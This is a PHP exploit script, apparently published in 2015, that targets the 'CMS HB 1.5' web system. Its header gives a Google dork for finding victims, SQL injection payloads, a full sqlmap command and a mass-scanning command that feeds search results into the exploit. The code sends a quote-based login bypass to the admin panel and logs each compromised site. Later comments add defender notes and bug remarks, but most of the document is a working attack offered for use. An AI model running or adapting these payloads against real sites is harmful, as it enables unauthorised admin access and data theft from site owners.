
Exploit XPL 0day CMS HB 1.5

Author: Cleiton Pinheiro, Published: 15-05-2015
<?php

/*
[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: rammstain960@gmail.com
[*] Thanks M3t4tr0n
[*] Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

# SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
------------------------------------------------------------------------------

# FAILURE REPORTED: 15/maio/2015

# ADMINISTRATIVE ACCESS PANEL

# Vendor: http://www.hbwebecia.com.br/
# CMS HB 1.5

# Google Dork: inurl:base.php?pagina

# FILE VULN /admin/logar.php
# POC: (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

# FILE VULN /base.php
# POC: (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

# USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1' //
--dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118' //
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //
--flush-session --batch

# EXECUTE: php xpl.php -t http://target.us

# FILE_OUTPUT : HB.txt

# EXPLOIT MASS USE SCANNER INURLBR
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
------------------------------------------------------------------------------


*/
// Runtime setup for a long-running CLI run: error_reporting(1) reports E_ERROR only
// (notices from undefined indexes below are therefore hidden), the time limit is removed
// twice (set_time_limit and the ini setting), and output is flushed as it is produced.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

// CLI options: -t <target> is required; -f is declared but never read in this file;
// --help prints the usage text.
$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";
$menu = "
-t : SET TARGET.
Execute:
php xpl.php -t target
php xpl.php -t target/path
\n";
// With --help the exit() prints $menu and terminates; otherwise the echo prints nothing (NULL).
echo isset($op_['help']) ? exit($menu) : NULL;
// 'host': the -t value, prefixed with http:// when it does not already contain "http"
// (strstr() is a substring test, not a prefix test). A missing -t terminates the script;
// $op_['t'] is read without isset(), so that case also raises a hidden notice first.
// 'line': separator printed after each result.
$params = array(
'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),
'line' => "-----------------------------------------------------------------------------------------------"
);

// Push the PHP output buffer to the SAPI and then the SAPI buffer to the client/terminal,
// so progress lines appear immediately instead of at script end. Order matters:
// ob_flush() must run before flush().
function __plus() {
ob_flush();
flush();
}

/**
 * Whether $valor carries a usable value.
 *
 * Returns false for null and for everything empty() treats as empty
 * ('', '0', 0, 0.0, [], false); true otherwise. Always returns a bool.
 */
function not_isnull_empty($valor = NULL) {
    // empty() is already true for null, so a separate is_null() test adds nothing.
    return !empty($valor);
}

/**
 * Send one POST to {$params['host']}/admin/logar.php carrying the quote-based login
 * probe from the header and return the raw cURL result.
 *
 * @param array $params  expects $params['host'] (scheme + host, no trailing slash)
 * @return array  [0 => response body or false, 1 => curl_getinfo() array, 2 => curl_error() string]
 *
 * Defender notes: a login handler is only affected if it splices the 'login' and 'senha'
 * fields into its SQL by string concatenation; a prepared statement with bound parameters
 * plus hashed password verification closes this regardless of input. The probe is easy to
 * spot in access logs: quote characters inside the login/senha fields of a POST to
 * /admin/logar.php.
 */
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");
// Randomised User-Agent per request; rand() is fine here, nothing security-relevant depends on it.
curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));
// TLS certificate and hostname checks are disabled, so an https:// target is not
// authenticated and the response could come from anyone on the path.
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);

// $info is not initialised; the first assignment auto-creates the array.
// CURLOPT_FOLLOWLOCATION is never set, so a redirect response is not followed and
// curl_getinfo()['redirect_url'] carries the Location target for the caller to inspect.
$info[0] = curl_exec($objcurl);
$info[1] = curl_getinfo($objcurl);
$info[2] = curl_error($objcurl);

// Both calls return nothing useful; the concatenation only sequences their side effects
// (close the handle, flush output) and the resulting string is discarded.
curl_close($objcurl) . __plus();
unset($objcurl);

return $info;
}

// NOTE: date("h:m:s") here and below prints hour:MONTH:second — the minutes specifier is "i".
print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";

// [body, curl_getinfo, curl_error] from the single probe request.
$_h = __request($params);

// Success signal: the unfollowed redirect points at the admin area. redirect_url is ''
// when there was no redirect (strstr then returns false), and the test matches the path
// anywhere in the URL, not only as a prefix. On the server side, the fix is to bind the
// login fields as query parameters; an unexplained Location: /admin/index.php after a
// login POST containing quotes is the thing to alert on.
if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {

print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";
print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";
print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";
print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";
// Appends to HB.txt in the current working directory; never truncates.
file_put_contents("HB.txt", "{$params['host']} - LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);
__plus();
} else {

// $_h[2] is always set (curl_error() returns a string), so isset() is redundant here;
// the same test is what not_isnull_empty() above expresses.
print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";
}
